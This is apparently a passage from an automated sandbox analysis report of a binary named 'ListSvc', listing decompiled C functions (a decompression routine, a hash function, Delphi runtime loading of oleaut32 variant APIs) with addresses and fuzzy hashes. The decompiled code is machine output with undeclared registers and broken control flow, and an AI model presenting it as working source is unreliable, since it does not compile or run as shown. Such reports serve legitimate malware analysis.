									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E00425294( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}

0x004255e8
0x004255eb
0x004255ee
0x004255f9
0x004255fc
0x0042560d
0x0042561e
0x00425626
0x0042562f
0x00425635
0x0042563b
0x00425644
0x0042564d
0x00425656
0x0042565f
0x00425668
0x00425671
0x0042567a
0x00425683
0x00425689
0x00425692
0x00425698
0x004256a1
0x004256af
0x004256b5
0x004256bb
0x00000000
0x004256bd
0x004256c4
0x004256c8
0x004256cd
0x004256d0
0x004256dd
0x004256dd
0x004256e0
0x004256e4
0x00425785
0x0042578e
0x004257c3
0x004257c3
0x004257c7
0x00000000
0x00000000
0x004257cc
0x004257cf
0x00425795
0x00425797
0x0042579a
0x0042579c
0x0042579c
0x0042579c
0x004257a9
0x004257aa
0x004257b0
0x004257b2
0x004257b5
0x004257b8
0x004257b9
0x004257bc
0x004257be
0x004257be
0x004257be
0x004257c0
0x004257c0
0x004257c0
0x00000000
0x004257c0
0x00000000
0x004257cf
0x004257d1
0x004257d3
0x004257eb
0x004257d5
0x004257df
0x004257df
0x004257f0
0x004257f2
0x004257f5
0x004257f8
0x004257f8
0x00425801
0x00425807
0x0042580a
0x00000000
0x00000000
0x00000000
0x00000000
0x00425810
0x00425810
0x00425819
0x0042581c
0x00425820
0x00000000
0x00000000
0x0042582a
0x0042582e
0x00425851
0x00425856
0x00425858
0x00425931
0x00425936
0x00425937
0x00425a77
0x00425a7d
0x00425a80
0x00425a83
0x00425a86
0x00425a8f
0x00425a88
0x00425a88
0x00425a88
0x00425a94
0x00425aac
0x00425aaf
0x00425ab5
0x00425ab9
0x00425ac0
0x00425abb
0x00425abb
0x00425abb
0x00425adc
0x00425adf
0x00425ae3
0x00425b5c
0x00425ae5
0x00425aeb
0x00425aee
0x00425afa
0x00425afc
0x00425b00
0x00425b36
0x00425b58
0x00425b02
0x00425b26
0x00425b26
0x00425b00
0x00425b5f
0x00425b5f
0x00425b60
0x00425b6b
0x00425b6b
0x00425b6f
0x00425b72
0x00425b84
0x00425b87
0x00425b94
0x00425b89
0x00425b8c
0x00425b8c
0x00425b97
0x00425b99
0x00425b9b
0x00425b9e
0x00425ba0
0x00425ba0
0x00425ba0
0x00425ba9
0x00425bb2
0x00425bb5
0x00425bb6
0x00425bb9
0x00425bbb
0x00425bbb
0x00425bbb
0x00425bbd
0x00425bc6
0x00425bc8
0x00425bcb
0x00425bce
0x00425bd2
0x00000000
0x00000000
0x00425bd7
0x00425bda
0x00000000
0x00000000
0x00000000
0x00425bda
0x00425bdc
0x00425bdf
0x00425be2
0x00000000
0x00000000
0x00000000
0x00425be2
0x00000000
0x00425b62
0x00425b62
0x00000000
0x00425b62
0x00425b60
0x0042594f
0x00425954
0x00425956
0x00425a06
0x00425a08
0x00425a26
0x00425a28
0x00425a2f
0x00425a35
0x00425a2a
0x00425a2a
0x00425a2a
0x00425a3b
0x00425a0a
0x00425a0a
0x00425a0a
0x00425a3e
0x00425a41
0x00425a43
0x00425a59
0x00425a5c
0x00425a5f
0x00425a68
0x00425a61
0x00425a61
0x00425a61
0x00425a6d
0x00000000
0x00425a6d
0x0042597d
0x0042597f
0x00000000
0x00000000
0x00425985
0x00425989
0x00425995
0x00425998
0x004259a1
0x0042599a
0x0042599a
0x0042599a
0x004259a6
0x004259aa
0x004259ac
0x004259af
0x004259b1
0x004259b1
0x004259b1
0x004259ba
0x004259c3
0x004259c6
0x004259c7
0x004259ca
0x004259cc
0x004259cc
0x004259cc
0x004259d4
0x004259d6
0x004259dc
0x004259df
0x004259e5
0x004259e5
0x00000000
0x004259df
0x00000000
0x0042598b
0x00425888
0x0042588d
0x00425890
0x004258d1
0x00425892
0x00425896
0x0042589c
0x0042589f
0x004258a4
0x004258a4
0x004258a4
0x004258a4
0x004258b0
0x004258c1
0x004258c1
0x004258da
0x004258dc
0x004258df
0x004258e5
0x004258e8
0x004258ea
0x004258ea
0x004258ea
0x004258ea
0x004258f3
0x004258f6
0x004258f7
0x004258fa
0x004258fc
0x004258fc
0x004258fc
0x004258fe
0x00425901
0x0042590a
0x0042590d
0x00425917
0x0042590f
0x0042590f
0x0042590f
0x00425903
0x00425903
0x00425903
0x00000000
0x00425901
0x00000000
0x00425830
0x00000000
0x00425822
0x00425be8
0x00425bee
0x00425bf7
0x00425bfd
0x00425c09
0x00425c12
0x00425c18
0x00425c21
0x00425c2a
0x00425c33
0x00425c39
0x00425c42
0x00425c4b
0x00425c57
0x00425c60
0x00425c69
0x00425c6b
0x00000000
0x00425c6b
0x00425701
0x00425704
0x0042570c
0x00425712
0x00425715
0x0042572e
0x00425735
0x00425738
0x0042573b
0x0042573e
0x00425740
0x00425745
0x00425748
0x00425750
0x00425752
0x0042575d
0x00425762
0x00425766
0x00000000
0x00425768
0x00425770
0x00425774
0x00425780
0x00425782
0x00000000
0x00425776
0x00000000
0x00425776
0x00000000
0x00000000
0x00000000
0x00425717
0x00425717
0x0042571a
0x0042571f
0x00425722
0x00425729
0x00425729
0x00000000

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004323DC, Relevance: .4, Instructions: 408
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
				signed int* _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				unsigned int* _t96;
				unsigned int* _t106;
				signed int* _t108;
				signed int _t109;

				_t109 = __edx;
				_v16 = __ecx;
				_v12 = __eax;
				_t106 =  &_v24;
				_t108 =  &_v28;
				_t96 =  &_v20;
				 *_t96 = __edx + 0xdeadbeef + _v16;
				 *_t106 =  *_t96;
				 *_t108 =  *_t96;
				_v8 = _v12;
				if((_v8 & 0x00000003) != 0) {
					if(__edx <= 0xc) {
						L20:
						if(_t109 > 0xc) {
							L23:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
							L24:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
							L25:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
							L26:
							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
							L27:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
							L28:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
							L29:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
							L30:
							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
							L31:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
							L32:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
							L33:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
							L34:
							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
							L35:
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
							return  *_t108;
						}
						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
							case 0:
								return  *_t108;
							case 1:
								goto L34;
							case 2:
								goto L33;
							case 3:
								goto L32;
							case 4:
								goto L31;
							case 5:
								goto L30;
							case 6:
								goto L29;
							case 7:
								goto L28;
							case 8:
								goto L27;
							case 9:
								goto L26;
							case 0xa:
								goto L25;
							case 0xb:
								goto L24;
							case 0xc:
								goto L23;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
						 *_t106 =  *_t106 +  *_t96;
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
						 *_t106 =  *_t106 +  *_t96;
						_t109 = _t109 - 0xc;
						_v8 =  &(_v8[3]);
					} while (_t109 > 0xc);
					goto L20;
				}
				if(__edx <= 0xc) {
					L3:
					if(_t109 > 0xc) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
						case 0:
							return  *_t108;
						case 1:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x000000ff;
							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
							goto L35;
						case 2:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x0000ffff;
							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
							goto L35;
						case 3:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x00ffffff;
							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
							goto L35;
						case 4:
							_v8 =  *_v8;
							 *__eax =  *__eax +  *_v8;
							goto L35;
						case 5:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 6:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 7:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 8:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 9:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xa:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xb:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xc:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							 *__ecx =  *__ecx + __edx;
							goto L35;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					 *_t96 =  *_t96 +  *_v8;
					 *_t106 =  *_t106 + _v8[1];
					 *_t108 =  *_t108 + _v8[2];
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
					 *_t106 =  *_t106 +  *_t96;
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
					 *_t106 =  *_t106 +  *_t96;
					_t109 = _t109 - 0xc;
					_v8 = _v8 + 0xc;
				} while (_t109 > 0xc);
				goto L3;
			}

0x004323dc
0x004323e5
0x004323e8
0x004323eb
0x004323ee
0x004323f1
0x004323ff
0x00432403
0x00432407
0x0043240c
0x00432413
0x0043261d
0x0043273d
0x00432740
0x00432784
0x0043278e
0x00432790
0x0043279a
0x0043279c
0x004327a6
0x004327a8
0x004327af
0x004327b1
0x004327bb
0x004327bd
0x004327c7
0x004327c9
0x004327d3
0x004327d5
0x004327dc
0x004327de
0x004327e8
0x004327ea
0x004327f4
0x004327f6
0x00432800
0x00432802
0x00432808
0x0043280a
0x0043280c
0x0043281a
0x0043281e
0x0043282c
0x00432830
0x0043283e
0x00432842
0x00432850
0x00432854
0x00432862
0x00432866
0x00432874
0x00432878
0x00432886
0x00000000
0x00432888
0x00432742
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00432623
0x00432623
0x0043264d
0x0043267a
0x004326a7
0x004326ab
0x004326b9
0x004326bd
0x004326c1
0x004326cf
0x004326d3
0x004326d7
0x004326e5
0x004326e9
0x004326ed
0x004326fb
0x004326ff
0x00432703
0x00432711
0x00432715
0x00432719
0x00432727
0x0043272b
0x0043272d
0x00432730
0x00432734
0x00000000
0x00432623
0x0043241c
0x004324cd
0x004324d0
0x00000000
0x00000000
0x004324d6
0x00000000
0x00000000
0x00000000
0x0043251b
0x0043251d
0x00432523
0x00000000
0x00000000
0x0043252d
0x0043252f
0x00432535
0x00000000
0x00000000
0x0043253f
0x00432541
0x00432547
0x00000000
0x00000000
0x00432551
0x00432553
0x00000000
0x00000000
0x0043255a
0x0043255f
0x00432561
0x0043256a
0x00000000
0x00000000
0x00432571
0x00432576
0x00432578
0x00432581
0x00000000
0x00000000
0x00432588
0x0043258d
0x0043258f
0x00432598
0x00000000
0x00000000
0x0043259f
0x004325a4
0x004325a9
0x00000000
0x00000000
0x004325b0
0x004325b5
0x004325ba
0x004325bc
0x004325c5
0x00000000
0x00000000
0x004325cc
0x004325d1
0x004325d6
0x004325d8
0x004325e1
0x00000000
0x00000000
0x004325e8
0x004325ed
0x004325f2
0x004325f4
0x004325fd
0x00000000
0x00000000
0x00432604
0x00432609
0x0043260e
0x00432613
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00432422
0x00432422
0x00432427
0x0043242f
0x00432437
0x0043243b
0x00432449
0x0043244d
0x00432451
0x0043245f
0x00432463
0x00432467
0x00432475
0x00432479
0x0043247d
0x0043248b
0x0043248f
0x00432493
0x004324a1
0x004324a5
0x004324a9
0x004324b7
0x004324bb
0x004324bd
0x004324c0
0x004324c4
0x00000000

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9C4, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363

Uniqueness

Uniqueness Score: -1.00%

Function 00405AE0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64

Uniqueness

Uniqueness Score: -1.00%

Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}

0x00427882
0x00427896
0x004278ac
0x004278c2
0x004278d8
0x004278ee
0x00427904
0x0042791a
0x00427930
0x00427946
0x0042795c
0x00427972
0x00427988
0x0042799e
0x004279b4
0x004279ca
0x004279e0
0x004279f6
0x00427a0c
0x00427a22
0x00427a38
0x00427a4e
0x00427a5e
0x00427a64
0x00427a6b

APIs

GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D

Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861

Strings

oleaut32.dll, xrefs: 00427878
VarMul, xrefs: 004278F9
VarMod, xrefs: 0042793B
VarAdd, xrefs: 004278CD
VarBoolFromStr, xrefs: 00427A17
VarCmp, xrefs: 00427993
VarDateFromStr, xrefs: 004279EB
VarR8FromStr, xrefs: 004279D5
VariantChangeTypeEx, xrefs: 0042788B
VarNot, xrefs: 004278B7
VarR4FromStr, xrefs: 004279BF
VarI4FromStr, xrefs: 004279A9
VarIdiv, xrefs: 00427925
VarOr, xrefs: 00427967
VarNeg, xrefs: 004278A1
VarBstrFromDate, xrefs: 00427A43
VarCyFromStr, xrefs: 00427A01
VarXor, xrefs: 0042797D
VarBstrFromCy, xrefs: 00427A2D
VarAnd, xrefs: 00427951
VarSub, xrefs: 004278E3
VarDiv, xrefs: 0042790F
VarBstrFromBool, xrefs: 00427A59

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
